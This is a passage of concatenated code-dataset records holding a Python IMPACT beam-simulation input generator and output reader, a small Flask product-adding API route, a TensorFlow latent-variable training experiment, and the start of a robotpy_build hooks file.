ant.demo()\n\n","sub_path":"poet_distributed/niches/box2d/ant_terrain_mjc/ant_blind.py","file_name":"ant_blind.py","file_ext":"py","file_size_in_byte":25937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"396039734","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 20 21:23:03 2016\n\n@author: kilean\n\"\"\"\n# IMPACT input generator, output reader and plot \n# key data structure are 'beam' and 'element' dictionary\n\n\n###############################################################################\n###############################################################################\n### IMPACT INPUT GENERATOR ###\n###############################################################################\n###############################################################################\n#%%============================================================================\n# beam \n#==============================================================================\ndef getBeam() :\n \"\"\"\n get a template of a beam dictionary. \n units : \n mass : eV\n energy = kinetic energy : eV\n current : Ampere\n x00, x11, x01 : IMPACT internel dimension\n frequency : Hz\n phase : radian\n charge per mass = charge number / mass : 1/eV\n \"\"\"\n beam = {'mass': 938.27231e6, # eV/c^2\n 'energy': 150.0e6, # eV\n 'n_particles': 1,\n 'distribution id':3,\n 'restart flag':0,\n 'current' : 0.0, # ampere\n 'x00': 0.0, 'x11': 0.0, 'x01': 0.0, # IMPACT internel dimension\n 'y00': 0.0, 'y11': 0.0, 'y01': 0.0,\n 'z00': 0.0, 'z11': 0.0, 'z01': 0.0,\n 'frequency': 650.0e6, # Hz\n 'phase': 0.0, #radian\n 'charge per mass' : 0,\n 'mesh_x' : 16, 'mesh_y' : 16, 'mesh_z' : 16}\n \n beam['charge per mass']=1.0/beam['mass']\n return beam\n\ndef twiss2beam(beam,betx,alfx,norm_ex,bety,alfy,norm_ey,betz,alfz,norm_ez):\n \"\"\"\n update the beam distribution using twiss parameters \n !! 
IMPORTANT : energy and frequency must be updated before hand \n input \n beam = (dict) beam dictionary to be updated\n betx = beta-function in x-direction\n alfx = alpha-function in x-direction\n norm_ex = normalized emittance in x-direction \n betz = beta-function in z-direction\n alfz = alpha-function in z-direction\n norm_ez = normalized emittance in z-direction \n \"\"\"\n clight = 299792458 # m/s\n rel_gamma = 1.0 + beam['energy']/beam['mass']\n rel_beta = (1.0 - 1.0/rel_gamma/rel_gamma)**0.5\n dummy = 2*3.14159265359*beam['frequency']/clight\n \n if betx==0:\n beam['x00']=0.0\n beam['x11']=0.0\n beam['x01']=0.0 \n else: \n beam['x00']=dummy*( betx* norm_ex/rel_gamma/rel_beta /(1.0+alfx*alfx) )**0.5\n beam['x11']=rel_gamma*rel_beta*( norm_ex/rel_gamma/rel_beta /betx )**0.5\n beam['x01']=alfx / (1.0+alfx*alfx)**0.5\n \n if bety==0:\n beam['y00']=0.0\n beam['y11']=0.0\n beam['y01']=0.0 \n else: \n beam['y00']=dummy*( bety* norm_ey/rel_gamma/rel_beta /(1.0+alfy*alfy) )**0.5\n beam['y11']=rel_gamma*rel_beta*( norm_ey/rel_gamma/rel_beta /bety )**0.5\n beam['y01']=alfy / (1.0+alfy*alfy)**0.5 \n\n if betz==0:\n beam['z00']=0.0\n beam['z11']=0.0\n beam['z01']=0.0 \n else: \n beam['z00']=3.14159265359/180*( betz*norm_ez/(1.0+alfz*alfz) )**0.5\n beam['z11']=( norm_ez/betz )**0.5 /beam['mass']*1.0E6\n beam['z01']=-alfz / (1.0+alfz*alfz)**0.5 \n \n \ndef beam2str(beam):\n \"\"\"\n from beam to string list of IMPACT format\n input \n x = (dict) beam \n output \n f = (list) list of string of IMPACT format of beam\n \"\"\"\n beamStrList=['1 1 \\n',\n '6 '+str(beam['n_particles'])+' 2 0 1 \\n',\n str(beam['mesh_x'])+' '+str(beam['mesh_y'])+' '+\\\n str(beam['mesh_z'])+' 1 0.1 0.1 0.1 \\n',\n str(beam['distribution id'])+' '+\\\n str(beam['restart flag'])+' 0 1 \\n',\n str(beam['n_particles'])+' \\n',\n str(beam['current'])+' \\n',\n str(beam['charge per mass'])+' \\n',\n str(beam['x00'])+' '+str(beam['x11'])+' '+str(beam['x01'])+' '+'1 1 0 0 \\n',\n str(beam['y00'])+' '+str(beam['y11'])+' '+str(beam['y01'])+' '+'1 1 0 0 \\n',\n str(beam['z00'])+' '+str(beam['z11'])+' '+str(beam['z01'])+' '+'1 1 0 0 \\n',\n str(beam['current'])+' '+str(beam['energy'])+' '+str(beam['mass'])+' 1.0 '+\\\n str(beam['frequency'])+' '+str(beam['phase'])+' \\n',\n '!==lattice=======================================\\n' \n ]\n return beamStrList\n\n \ndef str2beam(beamStr):\n \"\"\"\n from string list of IMPACT format to beam\n input \n beamStr = (list) list of string of IMPACT format\n output \n beam = (dict) beam dictionary\n \"\"\"\n beam=getBeam()\n beam['n_particles']=int(beamStr[1].split()[1])\n beam['mesh_x'],beam['mesh_y'],beam['mesh_z']=[int(beamStr[2].split()[0]) for i in range(3)]\n beam['distribution id']=int(beamStr[3].split()[0])\n beam['restart flag']=int(beamStr[3].split()[1])\n beam['current']=float(beamStr[5].split()[0])\n beam['charge per mass']=float(beamStr[6].split()[0])\n beam['x00'],beam['x11'],beam['x01']=[float(beamStr[7].split()[i]) for i in range(3)]\n beam['y00'],beam['y11'],beam['y01']=[float(beamStr[8].split()[i]) for i in range(3)]\n beam['z00'],beam['z11'],beam['z01']=[float(beamStr[9].split()[i]) for i in range(3)]\n beam['current'],beam['energy'],beam['mass']=[float(beamStr[10].split()[i]) for i in range(3)]\n beam['frequency'],beam['phase']=[float(beamStr[10].split()[i]) for i in range(4,6)]\n return beam \n\n#%%============================================================================\n# lattice 
\n#==============================================================================\n\n#%%#================================element====================================\ndef getElem(elemType) : \n \"\"\"\n get a template of an element dictionary. \n input \n elemType = (str) element type\n output \n f = (dict) element dictionary\n \"\"\"\n if elemType=='drift' :\n return {'type':'drift', 'length': 0.1, 'n_sckick': 1, \n 'n_map': 1, 'radius': 1.0} \n elif elemType=='quad' :\n return {'type':'quad', 'length': 0.1, 'n_sckick': 2, 'n_map': 1, \n 'B1': 17.0, 'input file id' : 0, 'radius': 1.0} # B1 [T/m]\n elif elemType=='bend' :\n return {'type':'bend', 'length': 1.0, 'n_sckick': 25, 'n_map': 1, \n 'angle': 0.9, 'k1': 0.0, 'input switch' : 150, #angle [rad]\n 'radius': 1.0, 'entrance edge':0.0, 'exit edge':0.0, #edge[rad]\n 'entrance curvature':0.0, 'exit curvature':0.0, 'FINT':0.0} \n elif elemType=='scrf' :\n return {'type':'scrf', 'length': 0.948049, 'n_sckick': 100, 'n_map': 1,\n 'scale': 34.0e6, 'frequency': 650e6 , 'phase': 0.0, \n 'input file id' : 1, 'radius': 1.0} # phase [degree]\n elif elemType=='kick' :\n return {'type':'kick', 'dx': 0.0 , 'dpx': 0.0, 'dy' : 0.0, 'dpy': 0.0, \n 'dz' : 0.0, 'dpz': 0.0} \n # dx,dy in meter, dpx,dpy in radian, dz in degree, dpz in MeV \n elif elemType=='write full' :\n return {'type':'write full', 'output file id': 1000}\n elif elemType=='restart' :\n return {'type':'restart'} \n elif elemType=='halt' :\n return {'type':'halt'} \n \ndef elem2str(elemDict): \n \"\"\"\n from element to (IMPACT format) string\n input \n x = (dict) element dictionary\n output \n f = (str) element string in IMPACT format\n \"\"\"\n if elemDict['type']=='drift':\n return str(elemDict['length'])+' '+str(elemDict['n_sckick'])+' '+\\\n str(elemDict['n_map'])+' 0 '+str(elemDict['radius'])+' /\\n'\n elif elemDict['type']=='quad' :\n return str(elemDict['length'])+' '+str(elemDict['n_sckick'])+' '+\\\n str(elemDict['n_map'])+' 1 '+str(elemDict['B1'])+' '+\\\n str(elemDict['input file id'])+' '+str(elemDict['radius'])+' /\\n' \n elif elemDict['type']=='bend' :\n return str(elemDict['length'])+' '+str(elemDict['n_sckick'])+' '+\\\n str(elemDict['n_map'])+' 4 '+str(elemDict['angle'])+' '+\\\n str(elemDict['k1'])+' '+str(elemDict['input switch'])+' '+\\\n str(elemDict['radius'])+' '+str(elemDict['entrance edge'])+' '+\\\n str(elemDict['exit edge'])+' '+\\\n str(elemDict['entrance curvature'])+' '+\\\n str(elemDict['exit curvature'])+' '+str(elemDict['FINT'])+' /\\n' \n elif elemDict['type']=='scrf' :\n return str(elemDict['length'])+' '+str(elemDict['n_sckick'])+' '+\\\n str(elemDict['n_map'])+' 104 '+str(elemDict['scale'])+' '+\\\n str(elemDict['frequency'])+' '+str(elemDict['phase']) +' '+\\\n str(elemDict['input file id'])+' '+str(elemDict['radius'])+' /\\n' \n elif elemDict['type']=='kick' : \n return '0.0 0 0 -21 1.0 '+str(elemDict['dx'])+' '+\\\n str(elemDict['dpx'])+' '+str(elemDict['dy'])+' '+\\\n str(elemDict['dpy'])+' '+str(elemDict['dz'])+' '+\\\n str(elemDict['dpz'])+' /\\n' \n elif elemDict['type']=='write full' : \n return '0.0 0 '+str(elemDict['output file id'])+' -2 0.0 1 /\\n'\n elif elemDict['type']=='restart' : \n return '0.0 0 0 -7 0 /\\n'\n elif elemDict['type']=='halt' : \n return '0.0 1 1 -99 0 /\\n' \n\n \ndef str2elem(elemStr): \n# from (IMPACT format) string to element \n# input \n# elemStr = (str) string of a IMPACT lattice line\n# output \n# elemtDict = (dict) element dictionary \n elemStr = elemStr.split()\n elemID=int(float(elemStr[3]))\n if elemID == 0:\n 
elemtDict = {'type':'drift',\n 'length': float(elemStr[0]),\n 'n_sckick': int(elemStr[1]), \n 'n_map': int(elemStr[2]), \n 'radius': float(elemStr[4])\n } \n elif elemID == 1:\n elemtDict = {'type':'quad',\n 'length': float(elemStr[0]),\n 'n_sckick': int(elemStr[1]), \n 'n_map': int(elemStr[2]), \n 'B1': float(elemStr[4]), \n 'input file id': int(elemStr[5]), \n 'radius': float(elemStr[6])\n } \n elif elemID == 4:\n elemtDict = {'type':'bend',\n 'length': float(elemStr[0]),\n 'n_sckick': int(elemStr[1]), \n 'n_map': int(elemStr[2]), \n 'angle': float(elemStr[4]), \n 'k1': float(elemStr[5]), \n 'input switch': float(elemStr[6]),\n 'radius': float(elemStr[7]),\n 'entrance edge': float(elemStr[8]),\n 'exit edge': float(elemStr[9]),\n 'entrance curvature': float(elemStr[10]),\n 'exit curvature': float(elemStr[11]),\n 'FINT': float(elemStr[12]),\n } \n elif elemID == 104:\n elemtDict= {'type':'scrf',\n 'length': float(elemStr[0]),\n 'n_sckick': int(elemStr[1]), \n 'n_map': int(elemStr[2]), \n 'scale': float(elemStr[4]), \n 'frequency': float(elemStr[5]), \n 'phase': float(elemStr[6]), \n 'input file id': int(elemStr[7]), \n 'radius': float(elemStr[8])\n }\n elif elemID == -2:\n elemtDict= {'type':'write full',\n 'output file id': int(elemStr[2])} \n elif elemID == -7:\n elemtDict= {'type':'restart'}\n elif elemID == -99:\n elemtDict= {'type':'halt'} \n else :\n elemtDict= {} \n return elemtDict\n \n#%%=================================lattice====================================\n#lattice is a list of element dictionaries\n\ndef lattice2str(lattice):\n# from lattice to string list of IMPACT format\n# input \n# x = (list) lattice \n# output \n# f = (list) list of string of of IMPACT format\n latticeStr = []\n for i in range(len(lattice)):\n latticeStr.append(elem2str(lattice[i]))\n return latticeStr\n \ndef str2lattice(latticeStr):\n# from string list of IMPACT format to lattice\n# input \n# latticeStr = (list) list of string of of IMPACT format\n# output \n# lattice = (list) list of element dictionaries\n lattice = []\n for i in range(len(latticeStr)):\n elem = str2elem(latticeStr[i])\n if elem : #check if elem is not empty\n lattice.append(elem)\n return lattice \n\ndef updateLattice(lattice):\n# update lattice such that each begining location of element is saved\n# input \n# lattice = (list) list of elemenet dictionaries\n z=0.\n for i in range(len(lattice)):\n lattice[i]['z']=z\n z=z+lattice[i]['length']\n\n\ndef getElemIndex(lattice,typename):\n# from lattice list of dictionary to single element lattice list of dictionary\n# input \n# lattice = (list) list of elements dictionaries\n# output \n# oneElemLattice = (list) list of one type(=typename) element dictionaries\n f=[]\n for i in range(len(lattice)):\n if lattice[i]['type']==typename:\n f.append(i)\n return f\n#%%============================================================================\n# IMPACT test.in I/O \n#============================================================================== \ndef writeIMPACT(filename,beam,lattice=[]):\n# write a IMPACT input file\n# input \n# beam = (dict) beam dictionary\n# lattce = (list) list of element dictionaries\n beamStrList=beam2str(beam) \n latticeStrList=lattice2str(lattice)\n \n f=open(filename,'w') \n f.writelines(beamStrList)\n f.writelines(latticeStrList)\n f.close()\n\ndef readIMPACT(filename='test.in'):\n# read a IMPACT input file \n# output : (list) element dictionaries\n file = open(filename,'r')\n lines = file.readlines()\n file.close()\n row_end = len(lines)\n row_start = 11\n for i 
in range(0,row_end):\n if lines[i][:12] == '!==lattice==':\n row_start=i\n break\n lattice=str2lattice(lines[row_start+1:])\n beam=str2beam(lines[0:row_start])\n return beam, lattice\n \n \n#%%############################################################################\n###############################################################################\n### IMPACT OUTPUT Reader ###\n###############################################################################\n############################################################################### \ndef readReferenceOrbit(fileloc=''):\n file = open(fileloc+'fort.18','r')\n lines = file.readlines()\n file.close()\n f=[]\n for j in range(len(lines)) :\n f.append( [ float(lines[j].split()[i]) for i in range(5) ] )\n return f\n\n\ndef getZIndex(z,fileloc=''):\n rf = readReferenceOrbit(fileloc)\n dz = abs(rf[0][0]-z)\n for i in range(1,len(rf)) :\n if dz > abs(rf[i][0]-z) :\n dz=abs(rf[i][0]-z)\n f=i\n return f, rf[f][0]\n\n\ndef readBeamSize(direction,nSkip=1,fileLoc=''):\n# Read RMS beam size\n# input \n# direction = (char) 'x', 'y' or 'z'\n# nSkip = (int>0) number of lines to skip when reading output \n# output \n# f = (list) each element of list is a vector of \n# rms_x,px,y,py,z,E (meter, rad, deg, MeV)\n if direction == 'x':\n file = open(fileLoc+'fort.24','r')\n elif direction == 'z':\n file = open(fileLoc+'fort.26','r')\n else :\n file = open(fileLoc+'fort.25','r')\n lines = file.readlines()\n file.close()\n f=[] \n for i in range(0,len(lines),nSkip) :\n f.append(float(lines[i].split()[2]))\n return f\n\n\ndef readBeamSizeAt(zIndex,direction,nSkip=1,fileLoc=''):\n# Read RMS beam size at location corresponds to zIndex\n# input \n# direction = (char) 'x', 'y' or 'z'\n# nSkip = (int>0) number of lines to skip when reading output \n# output \n# f = (list) each element of list is a vector of \n# rms_x,px,y,py,z,E (meter, rad, deg, MeV)\n if direction == 'x':\n file = open(fileLoc+'fort.24','r')\n elif direction == 'z':\n file = open(fileLoc+'fort.26','r')\n else :\n file = open(fileLoc+'fort.25','r')\n lines = file.readlines()\n file.close()\n \n return float(lines[zIndex].split()[2]) \n \n \n \ndef readOptics(direction,nSkip=1,fileLoc=''):\n# Read Optics functions ( Optics ftn is calcualted using beam porfile )\n# input \n# zIndex = (int) \n# fileLoc = (string) path\n# output \n# self expnained\n if direction == 'x':\n file = open(fileLoc+'fort.24','r')\n elif direction == 'z':\n file = open(fileLoc+'fort.26','r')\n else :\n file = open(fileLoc+'fort.25','r')\n lines = file.readlines()\n file.close()\n f=[]\n for j in range(0,len(lines),nSkip) :\n sigmax, sigmap, alpha, emittance_norm = [ float(lines[j].split()[i]) for i in [2,4,5,6] ]\n beta=(1+alpha*alpha)**0.5 *sigmax/sigmap\n if direction == 'z':\n f.append( [beta, -alpha, emittance_norm] )\n else:\n f.append( [beta, -alpha, emittance_norm] )\n return f\n \ndef readOpticsAt(zIndex, direction, fileLoc=''):\n# Read Optics function at location corresponds to zIndex\n# input \n# zIndex = (int) \n# fileLoc = (string) path\n# output \n# self expnained\n if direction == 'x':\n file = open(fileLoc+'fort.24','r')\n elif direction == 'z':\n file = open(fileLoc+'fort.26','r')\n else :\n file = open(fileLoc+'fort.25','r')\n lines = file.readlines()\n file.close()\n sigmax, sigmap, alpha, emittance_norm = [ float(lines[zIndex].split()[i]) for i in [2,4,5,6] ]\n beta=(1+alpha*alpha)**0.5 *sigmax/sigmap\n \n if direction == 'z':\n return beta, -alpha, emittance_norm\n else :\n return beta, alpha, 
emittance_norm\n \n \n \ndef readCentroid(direction, nSkip=1, fileLoc=''):\n# Read RMS beam size\n# input \n# direction = (char) 'x', 'y' or 'z'\n# nSkip = (int>0) number of lines to skip when reading output \n# output \n# f = (list) each element of list is a vector of \n# rms_x,px,y,py,z,E (meter, rad, deg, MeV)\n if direction == 'x':\n file = open(fileLoc+'fort.24','r')\n elif direction == 'z':\n file = open(fileLoc+'fort.26','r')\n else :\n file = open(fileLoc+'fort.25','r')\n lines = file.readlines()\n file.close()\n f=[] \n for i in range(0,len(lines),nSkip) :\n f.append( [float(lines[i].split()[1]), float(lines[i].split()[3])] )\n return f \n\ndef readCentroidAt(zIndex, direction, fileLoc=''):\n# Read RMS beam size\n# input \n# direction = (char) 'x', 'y' or 'z'\n# nSkip = (int>0) number of lines to skip when reading output \n# output \n# f = (list) each element of list is a vector of \n# rms_x,px,y,py,z,E (meter, rad, deg, MeV)\n if direction == 'x':\n file = open(fileLoc+'fort.24','r')\n elif direction == 'z':\n file = open(fileLoc+'fort.26','r')\n else :\n file = open(fileLoc+'fort.25','r')\n lines = file.readlines()\n file.close()\n return float(lines[zIndex].split()[1]), float(lines[zIndex].split()[3])\n \n","sub_path":"pyimpact/impact.py","file_name":"impact.py","file_ext":"py","file_size_in_byte":19956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"479924906","text":"# project/server/api/views.py\n\n\n#################\n#### imports ####\n#################\n\nfrom flask import Blueprint, request, abort\nfrom project.server.models import Product\nfrom project.server import app, db\nfrom werkzeug.debug import get_current_traceback\n\n################\n#### config ####\n################\n\napi_blueprint = Blueprint('api', __name__,)\n\n\n################\n#### routes ####\n################\n\n@api_blueprint.route('/product', methods=['GET', 'POST'])\ndef addproduct():\n product_code = \"\"\n items = request.json['items']\n try:\n for item in items:\n product_code = item['product_code']\n product_description = item['product_description']\n item = Product(product_code, product_description)\n db.session.add(item)\n db.session.commit()\n product_code = product_code + \",\"\n except Exception as e:\n track = get_current_traceback(skip=1, show_hidden_frames=True,\n ignore_system_exceptions=False)\n track.log()\n abort(500)\n\n return 'Products: ' + product_code + ' added'\n","sub_path":"project/server/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"17221905","text":"import tensorflow as tf\nimport random\n#import tf.keras.layers.Dense\nimport numpy as np\nimport math as ma\n\ndef fun(m,x):\n\treturn m*x\n\ndef fun2(m,x):\n return m*ma.pow(x,2)\n\ndef fun3(m,x):\n return m*ma.pow(x,3)\n\n\nfor x in range(10):\n\tk = random.uniform(0, 1)\n\ty = fun(4,k)\n\tprint(str(k) + \",\" + str(y))\n\n\nlearning_rate = 0.0001\ntraining_epochs = 15\nbatch_size = 3\ndisplay_step = 1\n\n# Network Parameters\nn_hidden_1 = 256 # 1st layer number of neurons\nn_hidden_2 = 256 # 2nd layer number of neurons\nn_input = 784 # MNIST data input (img shape: 28*28)\nn_classes = 1 # MNIST total classes (0-9 digits)\n\n\n\t\nX = tf.placeholder(\"float\", [None, 1])\nY = tf.placeholder(\"float\", [None, 3])\nZ = tf.placeholder(\"float\", [None, 1])\nZ_old = tf.placeholder(\"float\", [None, 1])\nX_old = tf.placeholder(\"float\", 
[None, 1])\nZ_new = tf.placeholder(\"float\", [None, 1])\nY_new = tf.placeholder(\"float\", [None, 3])\nY_old = tf.placeholder(\"float\", [None, 3])\n\n\n\nweights = {\n 'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),\n 'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),\n 'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))\n}\nbiases = {\n 'b1': tf.Variable(tf.random_normal([n_hidden_1])),\n 'b2': tf.Variable(tf.random_normal([n_hidden_2])),\n 'out': tf.Variable(tf.random_normal([n_classes]))\n}\n\n\n\ndef set_batch(batch_size):\n\tx_array = np.array([])\n\ty_array = np.array([])\n\tfor x in range(batch_size):\n\t\trandnum = random.randint(1,101)\n\t\tif randnum > 50:\n\t\t\tmaxx = 4\n\t\telse:\n\t\t\tmaxx = -4\n\t\tm = maxx\t\t\n\t\ty_ind = np.array([])\n\t\tk = random.uniform(0, 1)\n\t\ty1 = fun(m,k)\n\t\ty2 = fun2(m,k)\n\t\ty3 = fun3(m,k)\n\t\ty = np.array((y1,y2,y3))\n\t\tx_array = np.append(x_array, k)\n\t\ty_array = np.append(y_array, y)\n\n\tx_array = np.reshape(x_array,(-1,1))\n\ty_array = np.reshape(y_array,(-1,3))\n\t\n\treturn x_array, y_array\n\n\n\n# Create model\ndef pred(x):\n # Hidden fully connected layer with 256 neurons\n layer_1 = tf.nn.relu(tf.compat.v1.layers.dense(x,256))\n # Hidden fully connected layer with 256 neurons\n layer_2 = tf.nn.relu(tf.compat.v1.layers.dense(layer_1,256))\n # Output fully connected layer with a neuron for each class\n out_layer = tf.compat.v1.layers.dense(layer_2,3)\n return out_layer\n\ndef dec(h,z):\n # Hidden fully connected layer with 256 neurons\n print(h)\n print(z)\n h_ = tf.concat([h,z],axis = 1)\t\n layer_1 = tf.nn.relu(tf.compat.v1.layers.dense(h_,256))\n # Hidden fully connected layer with 256 neurons\n layer_2 = tf.nn.relu(tf.compat.v1.layers.dense(layer_1,256))\n # Output fully connected layer with a neuron for each class\n out_layer = tf.compat.v1.layers.dense(layer_2,3)\n return out_layer\n\ndef z_pred(z,x):\n # Hidden fully connected layer with 256 neurons\n print(h)\n print(z)\n h_ = tf.concat([x,z],axis = 1)\n layer_1 = tf.nn.relu(tf.compat.v1.layers.dense(h_,256))\n # Hidden fully connected layer with 256 neurons\n layer_2 = tf.nn.relu(tf.compat.v1.layers.dense(layer_1,256))\n # Output fully connected layer with a neuron for each class\n out_layer = tf.compat.v1.layers.dense(layer_2,1)\n return out_layer\n\ndef mag_pred(z,x):\n # Hidden fully connected layer with 256 neurons\n print(h)\n print(z)\n h_ = tf.concat([x,z],axis = 1)\n layer_1 = tf.nn.relu(tf.compat.v1.layers.dense(h_,256))\n # Hidden fully connected layer with 256 neurons\n layer_2 = tf.nn.relu(tf.compat.v1.layers.dense(layer_1,256))\n # Output fully connected layer with a neuron for each class\n out_layer = tf.compat.v1.layers.dense(layer_2,1)\n return out_layer\n\n\nh = pred(X)\n#z_ = z_enc(Z)\ny_ = dec(h,Z)\n\n\nz_new_pred = z_pred(Z_old,X_old)\nmagnitude_pred = mag_pred(Z_old,X_old)\n\nmagnitude_real = tf.reduce_sum(tf.abs(Y_new - Y_old),axis = 1, keep_dims = True)\n\nmag_loss = tf.reduce_mean(tf.abs(magnitude_pred- magnitude_real))\nz_pred_loss = tf.reduce_mean(tf.squared_difference(z_new_pred , Z_new))\n\nz_loss = z_pred_loss + mag_loss\n\nloss = tf.reduce_mean(tf.squared_difference(y_, Y))\n\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain_op = optimizer.minimize(loss)\ntrain_z = optimizer.minimize(z_loss)\n\n# Initializing the variables\n\ngrads = tf.gradients(ys = loss, xs = Z)\ninit = tf.global_variables_initializer()\n\n#grads = tf.gradients(loss, Z)\n#grads, _ = 
tf.clip_by_global_norm(grads, 50) # gradient clipping\n#grads_and_vars = list(zip(grads, Z))\n#train_op_z = optimizer.apply_gradients(grads_and_vars)\n\n\n#grads = tf.gradients(ys = loss, xs = Z)\n\n\nwith tf.Session() as sess:\n\tsess.run(init)\n\tsaver = tf.train.Saver()\n\tsaver.restore(sess,'./model.ckpt')\n\tfor epoch in range(100000):\n\t\trandnum = random.randint(1,101)\n\t\tif randnum > 50:\n\t\t\tmaxx = 4\n\t\telse:\n\t\t\tmaxx = -4\n\n\t\tbatch_x, batch_y = set_batch(batch_size)\n\t\n#\t\tz = np.reshape(np.array((random.uniform(0, 1),random.uniform(0, 1))),(-1,2))\n\t\tz = np.reshape(np.random.uniform(low=-0.1, high=0.1, size=(3,1)),(-1,1))\n\t#\t_, c = sess.run([train_op, loss], feed_dict={X: batch_x,\n # Y: batch_y, Z:z})\n\t\tprint(\"new batch begins!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\t\tv = 0\n\t\tfor p in range(20):\n\n\t\t\tz_ol = np.copy(z)\n\t\t\tx_ol = np.copy(batch_x)\n\t\t\tc = sess.run([loss], feed_dict={X: batch_x,\n Y: batch_y, Z:z})\n\n\t\t\tprint('loss')\n\t\t\tprint(c)\n\t\t\tprint(\"z\")\n\t\t\tprint(z)\n\t\t\tpredy = np.reshape(sess.run([y_], feed_dict={X: batch_x,\n Y: batch_y, Z:z}),(-1,3))\n\n\t\t\tprint(\"y_old\")\n\t\t\tprint(predy)\n\t\t\tprint(\"y\")\n\t\t\tprint(batch_y)\n\t\t\n\t\t\tg = sess.run([grads],feed_dict={X: batch_x,Y: batch_y,Z:z})\n#\t\t\tprint(g[0][0])\n\t\t\tv_prev = np.copy(v)\n\t\t\tv = 0.001*v - 0.001*g[0][0]\n\t\t\tz += 0.001 * v_prev + (1+0.001)*v\n\t\t\tz = np.clip(z, -0.1, 0.1)\n\t\t\tz = [np.random.uniform(low=0.07, high=0.1, size=(1,1)) if z_ > 0 else np.random.uniform(low=-0.1, high=-0.07, size=(1,1)) for z_ in z]\t\t\t\n\t\t\tz = np.reshape(z,(3,1))\n\t\t\tz_ne = np.copy(z)\n\t\t\ty_new = np.reshape(sess.run([y_], feed_dict={X: batch_x,\n Y: batch_y, Z:z}),(-1,3))\n\t\t\tprint(\"y_new\")\n\t\t\tprint(y_new)\n\t#\t\t_, z_lo = sess.run([train_z, z_loss], feed_dict={X_old: x_ol, Z_old:z_ol, Z_new: z_ne})\n\t\t\t\n\t\t\t\n\t\t\tz_new_pre = sess.run([z_new_pred], feed_dict={X_old: x_ol, Z_old:z_ol})\n\n\t\t\tmag_new = sess.run([magnitude_real], feed_dict={Y_old:predy, Y_new:y_new})\n\t\t\tmag_pred = sess.run([magnitude_pred], feed_dict={Z_old:z_ol, X_old: x_ol})\n\n\t\t\t_, z_lo = sess.run([train_z, z_loss], feed_dict={X_old: x_ol, Z_old:z_ol, Z_new: z_ne,Y_old:predy, Y_new:y_new })\n\t\t\t\n\t\t\tprint(\"z loss\")\n\t\t\tprint(z_lo)\n\t\t\tprint(\"z_old\")\n\t\t\tprint(z_ol)\n\t\t\tprint(\"z_new\")\n\t\t\tprint(z_ne)\n\t\t\tprint(\"z_new_pred\")\n\t\t\tprint(z_new_pre)\n\t\t\tprint(\"mag\")\n\t\t\tprint(mag_new )\n\t\t\tprint(\"mag_pred\")\n\t\t\tprint(mag_pred)\t\t\n\t\t\tprint(\"##########################################################\")\t\n\t\t#\tc = sess.run([loss], feed_dict={X: batch_x,\n # Y: batch_y, Z:z})\n\t\t\t\n\t\t\t\n#\t\t\tprint(c)\t\t\n\t\t\n\t\tfor t in range(1):\n\t\t\t_, c = sess.run([train_op, loss], feed_dict={X: batch_x,\n Y: batch_y, Z:z})\n\t\tprint(\"saving model\")\n\t\tsaver.save(sess, \"./model_binary.ckpt\")\n\n\n#\t\tpredy = sess.run([y_], feed_dict={X: batch_x,\n # Y: batch_y, Z:z})\t\n\n\n\t#\tbatch_x_, batch_y_ = set_batch(batch_size,-maxx)\n\t\t'''\n\t\t#z_ = np.reshape(np.array((random.uniform(0, 1),random.uniform(0, 1))),(-1,2))\n\t#\tz = np.reshape(np.array(random.uniform(0, 1)),(-1,1))\n\t\tz = np.reshape(np.random.uniform(low=-0.0, high=1.0, size=(100,1)),(-1,1))\n\t\t#_, c = sess.run([train_op, loss], feed_dict={X: batch_x_,\n # Y: batch_y_, Z:z_})\n\t\tv = 0\n\t\tfor p in range(1000):\n\t\t\tg = sess.run([grads],feed_dict={X: batch_x_,Y: 
batch_y_,Z:z})\n\t\t\tv_prev = np.copy(v)\n\t\t\tv = 0.01*v - 0.001*g[0][0]\n\t\t\tz += 0.01 * v_prev + (1+0.01)*v\n#\t\t\tprint(type(z))\n\t\t\tz = np.clip(z, -1.0, 1.0)\n\n\t\tfor i in range(1):\n\t\t\t_, c = sess.run([train_op, loss], feed_dict={X: batch_x_,\n Y: batch_y_, Z:z})\n\t#\t\t_, c = sess.run([train_op, loss], feed_dict={X: batch_x,\n # Y: batch_y, Z:z})\n\t\t\n\t\t'''\n\t\tz = np.reshape(np.random.uniform(low=-0.1, high=0.1, size=(3,1)),(-1,1))\n\t\tc = sess.run([loss], feed_dict={X: batch_x,\n Y: batch_y, Z:z})\n#\t\tprint(c)\n#\t\tprint(\"random\")\n\n\t\t\n\t#\tc = sess.run([loss], feed_dict={X: batch_x_,\n # Y: batch_y_, Z:z})\n#\t\tprint(c)\n\n\n\t\n\n\n\tfor x in range(10):\n\t\tk = random.uniform(0, 1)\n\t\tk_ = np.reshape(k,(-1,1))\n\t#\tz = np.reshape(np.array((random.uniform(0, 1),random.uniform(0, 1))),(-1,2))\n\t\tz = np.reshape(np.array(random.uniform(0, 1)),(-1,2))\n\t\ty = sess.run([y_], feed_dict={X:k_,Z:z})\n\t\tprint(str(k) + \",\" + str(y))\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main3_binary.py","file_name":"main3_binary.py","file_ext":"py","file_size_in_byte":9088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"236273710","text":"\"\"\"\n Header2Whatever hooks used for generating C++ wrappers\n\"\"\"\n\nimport sphinxify\n\n# terrible hack\n__name__ = \"robotpy_build.hooks\"\nfrom .hooks_datacfg import ClassData, FunctionData, MethodData\n\n\n_missing = object()\n\n# TODO: this isn't the best solution\ndef _gen_int_types():\n for i in ('int', 'uint'):\n for j in ('', '_fast', \"_least\"):\n for k in ('8', '16', '32', '64'):\n yield f\"{i}{j}{k}_t\"\n yield \"intmax_t\"\n yield \"uintmax_t\"\n\n_int32_types = set(_gen_int_types())\n\n\nclass 